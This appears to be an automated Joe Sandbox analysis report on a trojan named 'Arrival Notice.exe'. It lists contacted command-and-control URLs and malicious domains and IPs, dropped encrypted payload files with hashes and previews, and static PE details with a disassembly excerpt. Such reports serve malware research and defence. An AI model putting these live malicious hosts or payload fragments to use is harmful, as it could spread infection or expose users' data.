http://www.wethebeststore.online/znb6/?m2gpQ=4z8JxI0nRVLXBlRrydZdwmqPRLgcHgod4ZZEwprDCqeuR1X4EJPq9hqUp4XV2iNrlK1zceLjjdxAFB8hiM3pNAL8f7bcCQHaun+lOMiDBkB7id3F4mO5dhanL54VXfzZsnkFdU/HHMoW&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.idaschem.xyz/k45l/	true	Avira URL Cloud: safe	unknown
http://www.vnxoso88.art/sciu/?m2gpQ=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLYniVjhicuG4fHS3nSlILxZzvAKFwxHmhkRjxK9ClG7JmJxrzRt3MvPo&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: malware	unknown
http://www.rtpakuratkribo.xyz/7m52/?m2gpQ=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGgYzE1+gbAbmefiRMJeaIMpM+K6CCyvQgZeaisFx9/9ei8/+pPx29LDH&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.ipk.app/phav/	true	Avira URL Cloud: safe	unknown
http://www.gamebaitopzo.fun/igdb/	true	Avira URL Cloud: safe	unknown
http://www.jigg.space/ezhm/	true	Avira URL Cloud: safe	unknown
http://www.030003452.xyz/7nfi/?m2gpQ=Hc05NKMVGljRJ208GoJiuvJwS+qtlqhBfxwxnuqPPp/t3suBlIaw+qLklfi1FFvtvcqP4hR32up8rQp3nsg47f9wbTR1iuyCcnVpZrM4KA8DS5fnn6F+xl7ZQWTXNpehtq7GmXwpqKtZ&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.39978.club/4bhh/?m2gpQ=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnuv1rwGVZHrlJTCOHoay8LjwAA5ZI3MNl68qZc1+kbfm1rx6EKcKPurO&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.jigg.space/ezhm/?m2gpQ=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4Jqhl0le5SLuNKA+C9qBgvFZXkaOdih32u0uCf5d5IJ7EKd73Mp04V7U&KjH=KRIxdVHP60TD8	true	Avira URL Cloud: safe	unknown
http://www.basicreviews.online/cop9/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.basicreviews.online/cgi-sys/suspendedpage.cgi?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM	find.exe, 0000000A.00000002.3755675493.0000000004EF0000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000004AA0000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.jigg.space/ezhm?gp=1&js=1&uuid=1731394600.0005327985&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiY	find.exe, 0000000A.00000002.3755675493.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003FA2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	find.exe, 0000000A.00000002.3755675493.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003636000.00000004.00000001.00040000.00000000.sdmp	false		high
http://www.basicreviews.online	fXkDwRWxFFQGfp.exe, 0000000C.00000002.3757179262.0000000005557000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www70.jigg.space/	fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.0000000003FA2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	find.exe, 0000000A.00000003.1693103735.00000000079CD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.strato.de	fXkDwRWxFFQGfp.exe, 0000000C.00000002.3755365047.000000000477C000.00000004.00000001.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
66.29.146.173	rtpakuratkribo.xyz	United States	19538	ADVANTAGECOMUS	true
13.248.169.48	www.ipk.app	United States	16509	AMAZON-02US	true
91.184.0.200	wethebeststore.online	Netherlands	197902	HOSTNETNL	true
144.76.190.39	basicreviews.online	Germany	24940	HETZNER-ASDE	true
199.59.243.227	77980.bodis.com	United States	395082	BODIS-NJUS	false
206.119.185.141	gtml.huksa.huhusddfnsuegcdn.com	United States	174	COGENT-174US	false
217.160.0.60	solarand.online	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	false
96.126.123.244	www.jigg.space	United States	63949	LINODE-APLinodeLLCUS	true
20.2.208.137	www.b2iqd.top	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	true
161.97.142.144	www.030003452.xyz	United States	51167	CONTABODE	true
172.67.221.220	www.megaweb8.top	United States	13335	CLOUDFLARENETUS	true
104.21.69.93	www.gamebaitopzo.fun	United States	13335	CLOUDFLARENETUS	true
209.74.64.58	www.pluribiz.life	United States	31744	MULTIBAND-NEWHOPEUS	true
3.33.130.190	dccf.earth	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554175
Start date and time:	2024-11-12 07:53:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Arrival Notice.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@17/15
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 55 Number of non-executed functions: 304
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
03:26:13	API Interceptor	9919661x Sleep call for process: find.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
66.29.146.173	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	www.rtpakuratkribo.xyz/7m52/
13.248.169.48	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	WlCVLbzNph.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	Bpfz752pYZ.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	uavINoSIQh.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	7DAKMhINGk.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.pluribiz.life	RFQ.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
	#10302024.exe	Get hash	malicious	FormBook	Browse	209.74.64.58
natroredirect.natrocdn.com	Maryam Farokhi-PhD- CV-1403.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	glued.hta	Get hash	malicious	FormBook	Browse	85.159.66.93
	AWB_NO_907853880911.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Wc7HGBGZfE.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	8aOelwlAyx.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	En88bvC0fc.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	PO-000172483.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	Quote_General_Tech_LLC_637673,PDF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.jigg.space	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	45.33.30.197
www.megaweb8.top	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	104.21.59.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://login.ocsgroup.com.mx/global/employee?user_id=DoFjJTOXrEySD0w_AN5X5CnN_jKgmQ-62fmUaqLwe1mjA5n_sht8bM4gHHi97AmLcwpN7hYmIxQBjkE9CyfZa5CdVasJGlMIE2D58io	Get hash	malicious	HTMLPhisher	Browse	3.142.216.28
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.38
	https://secure_sharing0documentpreview.wesendit.com/dl/UXseZ6Oj8WT8cWxHq/bXVoYW1hZC5hZGkubXVxcmlAc2ltZWRhcmJ5LmNvbQ	Get hash	malicious	Unknown	Browse	13.225.78.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	18.244.18.38
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	45.112.123.126
	https://protect-us.mimecast.com/s/18vfCQWNWqS1V8BlCPhEHGoqRR	Get hash	malicious	Unknown	Browse	65.9.66.67
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	108.139.47.33
	Setup.exe	Get hash	malicious	Unknown	Browse	18.239.94.39
	amen.arm6.elf	Get hash	malicious	Mirai	Browse	3.103.214.114
	amen.x86.elf	Get hash	malicious	Mirai	Browse	3.123.22.203
HOSTNETNL	SDBARVe3d3.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	DHL Express Doc 01143124.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	rDRAWINGDWGSINC.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	fJD7ivEnzm.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	jpdy1E8K4A.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	https://polidos.com/	Get hash	malicious	Unknown	Browse	91.184.0.111
	CITA#U00c7#U00c3O.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	CYTAT.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	Cotizaci#U00f3n.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
	PAGO $830.900.exe	Get hash	malicious	FormBook	Browse	91.184.0.200
ADVANTAGECOMUS	glued.hta	Get hash	malicious	FormBook	Browse	66.29.149.46
	RFQ.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	C2jr42FUsv.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	PO 026235Medline (Shanghai) Industries, Inc..exe	Get hash	malicious	FormBook	Browse	66.29.152.72
	XhAQ0Rk63O.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	AgentTesla	Browse	66.29.159.53
	COMMERCIAL-DOKUMEN-YANG-DIREVISI.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	MV Sunshine.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	SWIFT.exe	Get hash	malicious	FormBook	Browse	66.29.146.14
	#10302024.exe	Get hash	malicious	FormBook	Browse	66.29.146.14

Process:	C:\Windows\SysWOW64\find.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut3BB3.tmp

Download File

Process:	C:\Users\user\Desktop\Arrival Notice.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.99404953228696
Encrypted:	true
SSDEEP:	6144:iZuD5jhkbfW3TpzKquSRzWgbwbuUPGnEZ4zIXLeIFhnIzZk:iZuD5jhBNWvSRzWgbwbuU+EXXveZk
MD5:	39386C7C1480185B86F8DA1047783D49
SHA1:	48E4386E79B385F26A4368BBA45210FA2D2F36C5
SHA-256:	F2AC71D8D12243E0D524BF37A4E7E1F865D14BF68221A4862E9A447FA06A6127
SHA-512:	E1CCFD87BCAF10C62DECC77DCD23568DAB9822A46164CCF44C82594E9171ADF613C75BBE008F8F25D82A0F098FA3ED363A0BF3B8894B317EBAD067A9DDC2448F
Malicious:	false
Reputation:	low
Preview:	.....7QVOi.N..}.9M..\|@?...1LHGQNRSAN9NAMVTC7QVO1LHGQNRSA.9NACI.M7._...I..o.;(=.>3"1&"Zq5._"'3q,7s3;Wn(#v..dq; U)fJ\DvSAN9NAM/UJ.l6(.q( .s24.T..w63.-....,/.K...}.^..$5<~W6.O1LHGQNR..N9.@LVq...VO1LHGQN.SCO2OJMV.G7QVO1LHGQ.FSAN)NAM&PC7Q.O1\HGQLRSGN9NAMVTE7QVO1LHG!JRSCN9NAMVVCw.VO!LHWQNRSQN9^AMVTC7AVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHi%+*'AN9..IVTS7QV.5LHWQNRSAN9NAMVTC7qVOQLHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHG

C:\Users\user\AppData\Local\Temp\aut3BE3.tmp

Download File

Process:	C:\Users\user\Desktop\Arrival Notice.exe
File Type:	data
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	7.600227386305971
Encrypted:	false
SSDEEP:	384:k9/R//lkV/eZ0ZpIEurk9IobI1eZV53Z3PDKszA1Ck9T:kR//ir6trzSzX3mszkCk9T
MD5:	DF5E8393DE48DA312059260C1F32AE56
SHA1:	93F8166915F91694933F56565A9C0473C50987F1
SHA-256:	A2252884966553D65221E8C061B0940A9D918A6066C0B7796EBBCD3DC8023AC3
SHA-512:	512723A2A62B74F8F55EB11F9DCAC68EA0F485804247776E202AB71506A6DF00D29E25086F687BA1178666A8E35353B5AB448FC9842FF4E1F9554F2D0B2D4DC8
Malicious:	false
Reputation:	low
Preview:	EA06......3........SP.n......5e...`.....\|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....\|.0...&d.....Hz..a....l?..uo.....P......V0....j......\|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8\|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...\|...<..aw.].3c..H.@B?...G..1...' ....k\|.A.O..#.....}V`....#..H\|.P!..d....0z....Y..>K..G./....G.7c.H..b....W..1....?.01..b.!...@.?..o.F\|....p9......S.!..nb.!....zb0..

C:\Users\user\AppData\Local\Temp\isochronally

Download File

Process:	C:\Users\user\Desktop\Arrival Notice.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	172054
Entropy (8bit):	2.5798659155137793
Encrypted:	false
SSDEEP:	192:oUjxaM/0OCHqz+Q/muxDkrWRyBcyedHnCvd50j2Kkz8SWcsk4/NckWpSFIO8TIfn:5
MD5:	9C9E4FAC85C526CB98B7B61CAA00914E
SHA1:	556AAFA83B5114FC92C69D3BEA37CF3E504D0E56
SHA-256:	29761FB530E91A24BFAE7814A047277653AFE1331F970F8DA75D707F5B2969A4
SHA-512:	0208B8AF54F069B930FEF2FFB9D472B4122A69D0DA148BCA6818F87A5705961B5BE553B672CEDFA9B4B17C8C18290C8363EF103AF2327E01BD916B1F105102FF
Malicious:	false
Reputation:	low
Preview:	52110052110x52110552110552110852110b52110e52110c52110852110152110e52110c52110c52110c52110052110252110052110052110052110052110552110652110552110752110b52110852110652110b52110052110052110052110052110052110052110652110652110852110952110452110552110852110452110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110652110b52110a52110752110252110052110052110052110052110052110052110652110652110852110952110552110552110852110852110b52110852110652110e52110052110052110052110052110052110052110652110652110852110952110452110552110852110a52110b52110952110652110552110052110052110052110052110052110052110652110652110852110952110452110d52110852110c52110b52110a52110652110c52110052110052110052110052110052110052110652110652110852110952110552110552110852110e52110b52110852110352110352110052110052110052110052110052110052110652110652110852110952110452110552110952110052110b52110952110352110252110052110052110052110052110052110052110652110652110852110952110452110d5211

C:\Users\user\AppData\Local\Temp\savager

Download File

Process:	C:\Users\user\Desktop\Arrival Notice.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.99404953228696
Encrypted:	true
SSDEEP:	6144:iZuD5jhkbfW3TpzKquSRzWgbwbuUPGnEZ4zIXLeIFhnIzZk:iZuD5jhBNWvSRzWgbwbuU+EXXveZk
MD5:	39386C7C1480185B86F8DA1047783D49
SHA1:	48E4386E79B385F26A4368BBA45210FA2D2F36C5
SHA-256:	F2AC71D8D12243E0D524BF37A4E7E1F865D14BF68221A4862E9A447FA06A6127
SHA-512:	E1CCFD87BCAF10C62DECC77DCD23568DAB9822A46164CCF44C82594E9171ADF613C75BBE008F8F25D82A0F098FA3ED363A0BF3B8894B317EBAD067A9DDC2448F
Malicious:	false
Preview:	.....7QVOi.N..}.9M..\|@?...1LHGQNRSAN9NAMVTC7QVO1LHGQNRSA.9NACI.M7._...I..o.;(=.>3"1&"Zq5._"'3q,7s3;Wn(#v..dq; U)fJ\DvSAN9NAM/UJ.l6(.q( .s24.T..w63.-....,/.K...}.^..$5<~W6.O1LHGQNR..N9.@LVq...VO1LHGQN.SCO2OJMV.G7QVO1LHGQ.FSAN)NAM&PC7Q.O1\HGQLRSGN9NAMVTE7QVO1LHG!JRSCN9NAMVVCw.VO!LHWQNRSQN9^AMVTC7AVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHi%+*'AN9..IVTS7QV.5LHWQNRSAN9NAMVTC7qVOQLHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHGQNRSAN9NAMVTC7QVO1LHG

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.21397211930477
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Arrival Notice.exe
File size:	967'699 bytes
MD5:	3528850c6e60cab0b4e685182f02722c
SHA1:	27254508e6635119da9b23a59b07954c5ca5ceba
SHA256:	731d3d5a956febeb3d9f0d08c062b22e043a7b5b325ecaceec5db490bf59f185
SHA512:	f961ce817f7022a8e218bb88aa3bde70935e77b4b49a573ab1b4dbc06b67d77d47a71e604438399b7c9ef7d94372f768d6c810f96aa78f94df35cf6023eb0be7
SSDEEP:	12288:ehkDgouVA2nxKkorvdRgQriDwOIxmxiZnYQE7PJcE4aCTOWZKqXAeFVupr6YmtWc:uRmJkcoQricOIQxiZY1iaCnksA6YmtiM
TLSH:	CE25D021F5D69036C2F323B19E7EF7AA9A3D69360336D19723C82D315E605416B3A723
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x4165c1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	d3bf8a7746a8d1ee8f6e5960c3f69378

Entrypoint Preview

Instruction
call 00007F41ECBD7B2Bh
jmp 00007F41ECBCE99Eh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F41ECBCEB1Ah
cmp edi, eax
jc 00007F41ECBCECB6h
cmp ecx, 00000080h
jc 00007F41ECBCEB2Eh
cmp dword ptr [004A9724h], 00000000h
je 00007F41ECBCEB25h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F41ECBCEB17h
jmp 00007F41ECBCEEF2h
test edi, 00000003h
jne 00007F41ECBCEB26h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F41ECBCEB3Bh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F41ECBCEB1Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F41EF047317h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F41ECBCEADEh
rep movsd
jmp dword ptr [00000000h+edx*4]

Rich Headers

Programming Language:

[ C ] VS2010 SP1 build 40219
[C++] VS2010 SP1 build 40219
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8d41c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9328	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x844	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
